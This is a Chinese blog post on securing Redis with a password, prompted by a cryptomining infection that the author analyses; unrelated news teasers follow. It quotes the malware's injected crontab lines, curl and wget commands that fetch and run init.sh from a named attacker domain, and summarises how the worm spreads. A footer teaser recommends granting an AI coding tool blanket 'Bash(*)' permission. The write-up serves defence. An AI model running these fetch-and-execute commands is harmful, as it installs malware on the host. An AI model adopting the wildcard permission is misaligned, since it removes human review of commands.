Redis如何设置密码
前言为什么redis要设置密码内网环境可以不设置密码但是个人服务器以及线上公网服务器就有必要设置密码了。昨天我查看了一下minio的redis事件通知查看redis的key时发现多了几个奇怪的key。backup1backup2backup3。然后我猜想应该是挖矿病毒。如下面所示这样就将定时任务和脚本注入到了我们机器当中就会开始执行 init.sh 脚本backup1 */2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh backup2 */3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh backup3 */4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh backup4 */5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh init.sh脚本内容是什么http://en2an.top/cleanfda/init.sh我们查看这个key的value能得到它会去请求一个地址我们打开看一下这个init.sh到底是什么东西。如下图所示是个脚本文件。这个脚本还挺多的关闭selinux、杀掉别人的挖矿进程、杀掉CPU占用过高的进程如果是自己就跳过、修改破坏系统命令、自己造一个下载器downloads()函数、解锁和加锁定时任务、添加挖矿技术任务、设置SSH免密登陆、下载执行矿机挖矿程序、关闭防火墙、清除日志、感染已知的免密机器、下载执行is.sh。is.sh脚本内容是什么。http://en2an.top/cleanfda/is.sh如下图所示上面的init.sh会下载我们的is.sh脚本。我们看一下这个脚本是干什么。如下图所示这个脚本的内容也挺多的。下载masscan扫描器、下载pnscan扫描器、安装 redis 用于创建 redis 未授权访问的漏洞、执行 rs.sh。rs.sh脚本内容是什么http://en2an.top/cleanfda/rs.sh上面的连接可以查看这个脚本内容是什么。开放 6379 端口、自动化利用redis未授权写入定时任务利用 pnscan 扫描b段IP 6379 端口利用 masscan 进行扫描端口。Redis如何设置密码经过以上分析就知道这个病毒主要是通过你的redis注入进去执行挖矿脚本。如果你的redis没有设置密码而且暴露在公网上就要小心了。可以通过以下两种方式对我们的redis进行设置密码。方式一修改我们的redis.conf配置文件需要注意的是这种方式因为修改了配置文件 需要重新启动我们的redis才能生效。找到我们的redis.conf文件。Windows如下图所示我们编辑此文件找到requirepass放开注释设置指定的值就重启redis就生效了。Linux的话因为大家的安装方式可能不同我这边是通过docker安装的做了映射的。这里就不给大家演示了找到自己安装在linux的redis目录找到redis.conf配置文件跟windows一样的操作配置完重启就Ok了。方式二连接我们的redis然后通过指令的方式设置密码。这种方式比较简单而且不需要重启就生效。下面的指令的意思就是把密码设置为123456公网可不要设置这么简单阿。config set requirepass 123456我们查看一下我们的redis的密码。config get requirepass这样我们的密码就设置成功了退出我们的redis客户端再次连接的时候就生效了。总结公网的redis一定要设置密码阿不要不设置密码设置密码就一个指令非常容易可不要偷懒噢。

相关新闻

LightOnOCR-2-1B在算法竞赛中的应用:题目文本自动解析

LightOnOCR-2-1B在算法竞赛中的应用:题目文本自动解析

LightOnOCR-2-1B在算法竞赛中的应用:题目文本自动解析 1. 算法竞赛中的题目解析痛点 参加过算法竞赛的朋友都知道,读懂题目是解题的第一步,但往往也是最耗时的一步。一道典型的算法题通常包含问题描述、输入格式、输出格式、样例输入输出等…

2026/5/17 9:37:06 阅读更多 →
普通人如何拥有千万资产?

普通人如何拥有千万资产?

普通人怎么能拥有千万资产? 《经济学》读过吗? 《穷爸爸富爸爸》读过吗? 《七步创造终生收入》读过吗? 《国富论》读过吗? 《中央银行学》读过吗? 《金融炼金术》读过吗? 《货币的购买力》读过吗? 《小岛经济学》读过吗? 《钱的兴衰史》读过吗? 《货币银行…

2026/7/3 16:59:04 阅读更多 →
Fish-Speech-1.5与VITS结合:高质量语音生成的完整指南

Fish-Speech-1.5与VITS结合:高质量语音生成的完整指南

Fish-Speech-1.5与VITS结合:高质量语音生成的完整指南 你是不是也遇到过这样的场景:想给视频配个旁白,但自己的声音不够好听,或者想做个有声书,又觉得找专业配音太贵太麻烦?又或者,你只是单纯地…

2026/7/2 20:47:17 阅读更多 →

最新新闻

UE5 C++ 射线检测多物体:LineTraceMultiByObjectType详解

UE5 C++ 射线检测多物体:LineTraceMultiByObjectType详解

1. UE5 C 射线检测多物体的按通道与按对象类型 LineTraceMultiByObjectType 详解在虚幻引擎5(UE5)开发中,射线检测(Line Trace)是最常用的物理检测手段之一。今天我要分享的是如何通过C实现多物体射线检测,…

2026/7/4 19:09:28 阅读更多 →
Unity编辑器工具:高效处理3D模型的实用技巧

Unity编辑器工具:高效处理3D模型的实用技巧

1. Unity编辑器工具概述:模型处理的核心利器在Unity开发流程中,Editor工具链是提升工作效率的关键组件。针对3D模型处理这一高频需求,Unity提供了一系列原生和可扩展的编辑器功能,能够覆盖从资源导入到场景配置的全流程。不同于常…

2026/7/4 19:05:27 阅读更多 →
Mirror网络库插件优化与实战应用指南

Mirror网络库插件优化与实战应用指南

1. Mirror网络库插件深度解析Mirror作为Unity环境下广受欢迎的高性能网络库,其插件系统在实际项目开发中扮演着关键角色。这次我们将深入探讨第6代插件的核心特性与实战应用技巧,这些经验来自三个不同规模项目的实际验证。1.1 插件架构设计理念Mirror插件…

2026/7/4 19:05:27 阅读更多 →
数据中台架构设计与治理实战指南

数据中台架构设计与治理实战指南

1. 数据中台生态系统的核心价值三年前我接手某零售集团数据治理项目时,第一次深刻体会到数据孤岛的破坏力——市场部用T3的销售数据做促销决策,而仓储系统显示的是实时库存,这种数据割裂直接导致了一次千万级的营销事故。这正是数据中台要解决…

2026/7/4 19:03:27 阅读更多 →
claudecode如何放权?自动执行命令不再询问

claudecode如何放权?自动执行命令不再询问

0.shift tab开启自动模式1. 打开设置文件:在项目根目录或全局目录下找到 .claude/settings.json。2. 添加通配符白名单:修改 permissions 字段,加入 "Bash(*)"。完整配置如下:json{"permissions": {"all…

2026/7/4 19:03:27 阅读更多 →
LeetCode:买卖股票的最佳时机(1-3) - Python

LeetCode:买卖股票的最佳时机(1-3) - Python

121. Best Time to Buy and Sell Stock(买卖股票的最佳时机) 问题描述: 给定一个数组,它的第 i 个元素是一支给定股票第 i 天的价格。 如果你最多只允许完成一笔交易(即买入和卖出一支股票),设计…

2026/7/4 18:55:26 阅读更多 →

日新闻

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 正式发布,这是一个关键的安全修复版本,修复了多个方面的问题,还对部分功能进行了优化。 安全修复亮点 此次发布在安全修复上表现突出。binprot 避免了项目引用计数溢出,mcmc 因安全问题提升了上游版本号&#xf…

2026/7/4 0:04:29 阅读更多 →
终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案 【免费下载链接】HMCL A Minecraft Launcher which is multi-functional, cross-platform and popular 项目地址: https://gitcode.com/gh_mirrors/hm/HMCL HMCL(Hello Minecraft! Lau…

2026/7/4 0:06:29 阅读更多 →
KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

1. KMX63与PIC18F66K40的硬件协同架构解析KMX63作为一款三轴加速度计和磁力计组合传感器,与PIC18F66K40微控制器的搭配堪称嵌入式HMI开发的黄金组合。这套硬件组合的核心优势在于KMX63提供的高精度运动感知能力与PIC18F66K40强大的信号处理能力形成了完美互补。KMX6…

2026/7/4 0:06:29 阅读更多 →

周新闻

月新闻